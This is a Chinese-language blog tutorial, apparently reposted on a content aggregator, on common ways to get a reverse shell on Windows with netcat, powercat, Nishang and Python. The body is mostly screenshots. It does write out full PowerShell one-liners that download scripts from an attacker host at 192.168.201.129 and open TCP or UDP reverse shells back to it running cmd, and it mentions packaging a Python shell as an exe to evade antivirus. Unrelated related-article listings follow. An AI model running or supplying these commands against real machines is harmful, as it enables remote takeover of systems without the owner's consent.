Windows的几种常用反弹shell方法

这篇具有很好参考价值的文章主要介绍了Windows的几种常用反弹shell方法。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

零基础学黑客,搜索公众号:白帽子左一

简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。

交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。

非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执行它们。当它读到文件的结尾,shell也就终止了。

1.nc反弹shell

简介:nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具

第一步:开启nc监听,这里我直接使用了Kali自带的nc

windows反弹shell,windows,web安全,渗透测试,网络安全

第二步:在目标服务器上使用nc工具,这个nc可以自己上传

windows反弹shell,windows,web安全,渗透测试,网络安全

windows反弹shell,windows,web安全,渗透测试,网络安全

第三步:查看监听端的nc,是否有shell反弹过来。

windows反弹shell,windows,web安全,渗透测试,网络安全

2.powershell反弹cmd

简介:powercat是netcat的powershell版本,下载地址:https://github.com/besimorhino/powercat ,由于这个地址默认是被墙的,所以可以放在可被访问的远程服务器上。执行命令的时候,自动下载执行。

第一步:攻击者监听

windows反弹shell,windows,web安全,渗透测试,网络安全

第二步:在webshell上执行命令

powershell IEX (New-Object System.Net.Webclient).DownloadString(‘http://192.168.201.129/powercat.ps1‘); powercat -c 192.168.201.129 -p 9999 -e cmd

windows反弹shell,windows,web安全,渗透测试,网络安全

第三步:查看监听端的nc,是否有shell反弹过来。

windows反弹shell,windows,web安全,渗透测试,网络安全

3.nishang反弹shell

简介:Nishang(https://github.com/samratashok/nishang )是一个基于PowerShell的攻击框架,集合了一些 PowerShell攻击脚本和有效载荷,可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型shell。

3.1)TCP反弹shell
第一步:攻击者监听

windows反弹shell,windows,web安全,渗透测试,网络安全

第二步:在目标机器上执行命令

powershell IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.201.129/Shells/Invoke-PowerShellTcp.ps1’);Invoke-PowerShellTcp -Reverse -IPAddress 192.168.201.129 -port 9999

windows反弹shell,windows,web安全,渗透测试,网络安全

第三步:查看监听端的nc,是否有shell反弹过来。

windows反弹shell,windows,web安全,渗透测试,网络安全

3.2)UDP反弹shell

第一步:攻击者监听

windows反弹shell,windows,web安全,渗透测试,网络安全

第二步:在shell端执行命令

powershell IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.201.129/Shells/Invoke-PowerShellUdp.ps1’);Invoke-PowerShellUdp -Reverse -IPAddress 192.168.201.129 -port 53

windows反弹shell,windows,web安全,渗透测试,网络安全

第三步:查看监听端的nc,是否有shell反弹过来。

windows反弹shell,windows,web安全,渗透测试,网络安全

4.python反弹shell

简介:使用python编写反弹shell,如果目标支持python3可以脚本直接执行即可,如果遇到杀软可以使用生成exe的版本可以很好的逃逸杀软。

第一步:攻击者监听

windows反弹shell,windows,web安全,渗透测试,网络安全

第二步:在shell端执行命令

windows反弹shell,windows,web安全,渗透测试,网络安全

第三步:查看监听端的nc,是否有shell反弹过来。

windows反弹shell,windows,web安全,渗透测试,网络安全

windows反弹shell,windows,web安全,渗透测试,网络安全文章来源地址https://www.toymoban.com/news/detail-661257.html

到了这里,关于Windows的几种常用反弹shell方法的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Web:前端常用的几种Http请求GET和POST样例

    1、简述 在Web开发过程中,少不了发起Http请求服务端的接口数据,在不同的框架中使用了不同的Http请求方式,常用的请求有fetch、 ajax、 axios、XMLHttpRequest、request,以下样例仅供参考。 2、Fetch Fetch API 是一种 JavaScript API,是一种基于 Promise 的现代API,用于在网络中发送和接收

    2024年02月07日
    浏览(43)
  • Windows Bat实现延时功能的几种常见方式

    在 bat 批处理中实现延时功能的几种常用方式 使用ping命令可以实现延时的效果,命令如下: -n 指定 ping 的次数,每次大概间隔1s, nul 将 ping 过程回显信息给屏蔽 ping 命令实现的延时,时间精度:大约1s,内存占用: ping 命令所占用空间 注意闭坑:ping 从第1次发出请求到接收

    2024年02月11日
    浏览(35)
  • mysql复制表的几种常用方法

    遇到需要拷贝一个表及其数据的情况,总结了一下几种方法 1.使用 show create table 旧表 将结果拷贝出来,将旧表名换成新表名即可. 注意:该方法仅适用于拷贝表结构,不需要同步数据的情况 2.create table 新表 like 旧表 该语句将完全拷贝旧表结构, 如果需要同步数据,只需执行 insert…

    2024年01月16日
    浏览(51)
  • python发送邮件的几种常用方法

    第一种是最常见的,smtp发送 第二种是用outlook发送的,这个大家借鉴使用 第三种是正文需要用到表格的,我在这里给大家一个示例,具体表格怎么改自行发挥

    2024年02月16日
    浏览(45)
  • vue跳转页面的几种常用方法

    目录 vue跳转不同页面的方法 1.router-link跳转 2.this.$router.push() 3.a标签可以跳转外部链接,不能路由跳转 vue三种不同方式实现跳转页面 Vue:router-link this.$router.push(\\\"/\\\") this.$router.go(1) 代码示例: !-- 直接跳转 -- router-link to=\\\'/testC\\\'  button点击跳转2/button /router-link   !-- 带参数跳转

    2024年02月11日
    浏览(47)
  • Jmeter —— 常用的几种断言方法(基本用法)

    在使用JMeter进行性能测试或者接口自动化测试工作中,经常会用到的一个功能,就是断言,断言相当于检查点,它是用来判断系统返回的响应结果是否正确,以此帮我们判断测试是否通过,本文 主要介绍几种常用的断言:响应断言、JSON断言、BeanShell 断言 1. 响应断言是最常用

    2024年02月08日
    浏览(39)
  • 前端开发中,定位bug的几种常用方法

    目录 第一章 前言 第二章 解决bug的方法 2.1 百度 2.2 有道翻译 2.3 debugger 2.4 console.log 日志打印 2.5 请求体是否携带参数 2.6 注释页面渲染代码 2.7 其他 第三章 尾声 备注:该文章只是本人在工作/学习中常用的几种方法,如果有不对大家“胃口”的地方,勿喷,可以在评论区提供

    2024年02月04日
    浏览(48)
  • Web 页面之间传递参数的几种方法

    Web 页面之间传递参数的方法有很多种,下面列出一些常见的方法以及它们的代码示例。 一、前端直接传递参数 1、URL 参数传递(query string):通过 URL 的查询字符串(即问号后面的参数)将参数传递给页面。可以通过 location.search 或 URLSearchParams 对象来获取和解析参数。  2、

    2024年02月01日
    浏览(36)
  • web安全学习笔记【05】——反弹Shell、正反向连接

    思维导图 #知识点: 1、Web常规-系统中间件数据库源码等 2、Web其他-前后端软件Docker分配站等 3、Web拓展-CDNWAFOSS反向负载均衡等 ----------------------------------- 1、APP架构-封装原生态H5flutter等 2、小程序架构-WebH5JSVUE框架等 ----------------------------------- 1、渗透命令-常规命令文件上传

    2024年01月25日
    浏览(32)
  • ​Windows常用shell命令大全​

      Windows常用shell命令大全 基于鼠标操作的后果就是OS界面外观发生改变,  就得多花学习成本。更主要的是基于界面引导Path与命令行直达速度是难以比拟的。另外Geek很大一部分是键盘控,而非鼠标流的。 整理Windows的常用Shell命令,一方面帮助深入学习Mysql,另一方面准备尝

    2024年02月04日
    浏览(53)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包